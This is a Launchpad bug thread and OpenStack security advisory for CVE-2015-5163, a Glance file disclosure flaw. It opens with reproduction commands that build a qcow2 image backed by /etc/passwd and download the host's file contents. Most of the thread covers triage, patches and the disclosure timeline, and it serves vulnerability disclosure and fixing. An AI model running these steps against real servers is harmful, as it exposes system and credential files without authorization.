[OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)

Bug #1471912 reported by Eric Harney on 2015-07-06
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Glance
Critical
Flavio Percoco
Kilo
Undecided
Unassigned
OpenStack Security Advisory
Critical
Tristan Cacqueray

Bug Description

This is a security flaw that allows files from the Glance host to be obtained by a user.

I'm using the Glance file store and have set in /etc/glance/glance-api.conf:
[taskflow_executor]
engine_mode=serial # not sure if needed
conversion_format=raw

Make a malicious image available via HTTP.
$ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
$ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image

$ glance --os-image-api-version 2 task-create --type import --input '{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image", "image_properties": {"name": "my_image_test", "disk_format": "qcow2", "container_format": "bare"}}'
$ glance image-download my_image_test --file downloaded_image
$ head downloaded_image
<contents from /etc/passwd on the Glance host>

This happens because Glance runs this command which doesn't specify a format, and uses qemu-img's format auto-detection:
qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4 /tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted

Similar to Cinder bug 1415087.

CVE References

Eric Harney (eharney) wrote :

Oops... clearly meant to report this to the Glance project.

affects: cinder → glance

Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.

Changed in ossa:
status: New → Incomplete
description: updated
Grant Murphy (gmurphy) wrote :
Jeremy Stanley (fungi) wrote :

Looks like the timing of that addition makes it kilo-only. Still we need a kilo series task added to this bug to track the backport change for the stable/kilo branch.

Flavio Percoco (flaper87) wrote :

This is indeed an issue. I'll work on a patch for it asap and come report it back to the issue.

Flavio Percoco (flaper87) wrote :

Also, the change that introduced this issue is: https://review.openstack.org/#/c/159129/

Changed in ossa:
status: Incomplete → Confirmed
importance: Undecided → Critical
Jeremy Stanley (fungi) wrote :

Well, that commit too is kilo-only, so we at least won't need any fix backported to juno.

Impact description draft:

Title: Glance v2 API host file disclosure through qcow2 backing file
Reporter: Eric Harney (Red Hat)
Products: Glance
Affects: 2015.1.0

Description:
Eric Harney from Red Hat reported a vulnerability in Glance. By importing a qcow2 image with a malicious backing file, an authenticated user may mislead Glance import task action, resulting in the disclosure of any file on the Glance server for which the Glance process user has access to. Only setups using the Glance V2 API are affected by this flaw.

Jeremy Stanley (fungi) wrote :

The impact description looks good to me, but note that we've got 2015.1.1 sneaking up on us RSN so even if it doesn't take long to fix we'll likely need to change the affects line.

Flavio Percoco (flaper87) wrote :

Please, find the patch attached. The patch forbids importing images with backed files entirely.

Beside some pep8 errors, the patch succeed run_tests.sh here...

./glance/tests/unit/async/flows/test_import.py:22:1: H306 imports not in alphabetical order (oslo_config.cfg, oslo_concurrency.processutils)
./glance/async/flows/base_import.py:23:1: H306 imports not in alphabetical order (oslo_config.cfg, oslo_concurrency.processutils)
./glance/async/flows/base_import.py:168:9: E303 too many blank lines (2)

Eric Harney (eharney) wrote :

The patch seems reasonable to me. (Not a Glance expert.) Should remove the change to introspect.py.

Flavio Percoco (flaper87) wrote :

ops, sorry for the pep8 issues and the unwanted change in introspect.py

Grant Murphy (gmurphy) wrote :

New patch LGTM. Can we get a cores approval to progress this?

Grant Murphy (gmurphy) wrote :

CVE requested.

Grant Murphy (gmurphy) on 2015-07-28
summary: - Format-guessing and file disclosure via image conversion
+ Format-guessing and file disclosure via image conversion (CVE-2015-5163)

@glance-coresec, can we please get an approval before setting a disclosure date ?

second proposal for 0001-Don-t-import-files-with-backed-files.patch lgtm.

Thanks Flavio. Please ping me as soon as you have a proposed solution and I will +2/A it.

I see Stuart on subscribed here. Can we get his opinion prior to opening this bug?

Changed in glance:
status: New → Confirmed
importance: Undecided → Critical
assignee: nobody → Flavio Percoco (flaper87)
milestone: none → liberty-3

The proposed patch does not apply cleanly anymore, import causes issues. Here are fixed versions.

If these two last patchs are correct and if we can send the pre-OSSA by early Monday, the disclosure date could be:
2015-08-13, 1500UTC

Does that sounds good ?

Changed in ossa:
assignee: nobody → Tristan Cacqueray (tristan-cacqueray)
Jeremy Stanley (fungi) wrote :

I'm cool with the advisory going out on Thursday, August 13.

The affect line in the impact description is: "2015.1.0 versions through 2015.1.1"

This update fixes:
./glance/async/flows/base_import.py:25:1: H306 imports not in alphabetical order (oslo_utils.excutils, oslo_utils.encodeutils)

This update fixes:

testtools.testresult.real._StringException: Traceback (most recent call last):
  File "glance/tests/unit/async/flows/test_import.py", line 191, in test_import_flow_backed_file_import_to_fs
    failure.Failure)
NameError: global name 'failure' is not defined

Flavio Percoco (flaper87) wrote :

tested both patches - master and stable - and they both passed. Approved from my side!

Changed in ossa:
status: Confirmed → Fix Committed
information type: Private Security → Public Security

Fix proposed to branch: master
Review: https://review.openstack.org/212567

Changed in glance:
status: Confirmed → In Progress
summary: - Format-guessing and file disclosure via image conversion (CVE-2015-5163)
+ [OSSA 2015-014] Format-guessing and file disclosure via image conversion
+ (CVE-2015-5163)
description: updated

Reviewed: https://review.openstack.org/212568
Committed: https://git.openstack.org/cgit/openstack/glance/commit/?id=eb99e45829a1b4c93db5692bdbf636a86faa56c4
Submitter: Jenkins
Branch: stable/kilo

commit eb99e45829a1b4c93db5692bdbf636a86faa56c4
Author: Flavio Percoco <email address hidden>
Date: Thu Jul 9 14:44:04 2015 +0200

    Don't import files with backed files

    There's a security issue where it'd be possible to import images with
    backed files using the task engine and then use/convert those to access
    system files or any other file in the system. An example of an attack
    would be to import an image with a backing file pointing to
    `/etc/passwd`, then convert it to raw and download the generated image.

    This patch forbids importing files with baking files entirely. It does
    that in the `_ImportToFS` task, which is the one that imports the image
    locally to then execute other tasks on it. It's not necessary for the
    `_ImportToStore` task because other tasks won't be executed when the
    image is imported in the final store.

    Change-Id: I35f43c3b3f326942fb53b7dadb94700ac4513494
    Closes-bug: #1471912
    (cherry picked from commit d529863a1e8d2307526bdb395b4aebe97f81603d)

tags: added: in-stable-kilo

Reviewed: https://review.openstack.org/212567
Committed: https://git.openstack.org/cgit/openstack/glance/commit/?id=d529863a1e8d2307526bdb395b4aebe97f81603d
Submitter: Jenkins
Branch: master

commit d529863a1e8d2307526bdb395b4aebe97f81603d
Author: Flavio Percoco <email address hidden>
Date: Thu Jul 9 14:44:04 2015 +0200

    Don't import files with backed files

    There's a security issue where it'd be possible to import images with
    backed files using the task engine and then use/convert those to access
    system files or any other file in the system. An example of an attack
    would be to import an image with a backing file pointing to
    `/etc/passwd`, then convert it to raw and download the generated image.

    This patch forbids importing files with baking files entirely. It does
    that in the `_ImportToFS` task, which is the one that imports the image
    locally to then execute other tasks on it. It's not necessary for the
    `_ImportToStore` task because other tasks won't be executed when the
    image is imported in the final store.

    Change-Id: I35f43c3b3f326942fb53b7dadb94700ac4513494
    Closes-bug: #1471912

Changed in glance:
status: In Progress → Fix Committed
Matthew Thode (prometheanfire) wrote :

Are there some backported patches for at least 2015.1.1? The kilo patch doesn't apply to 2015.1.1 or 2015.1.0 :(

Matthew Thode (prometheanfire) wrote :

ah, it was the patch that was sent out that was malformed just get it here instead :D

Changed in ossa:
status: Fix Committed → Fix Released
Thierry Carrez (ttx) on 2015-09-04
Changed in glance:
status: Fix Committed → Fix Released
Thierry Carrez (ttx) on 2015-10-15
Changed in glance:
milestone: liberty-3 → 11.0.0
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers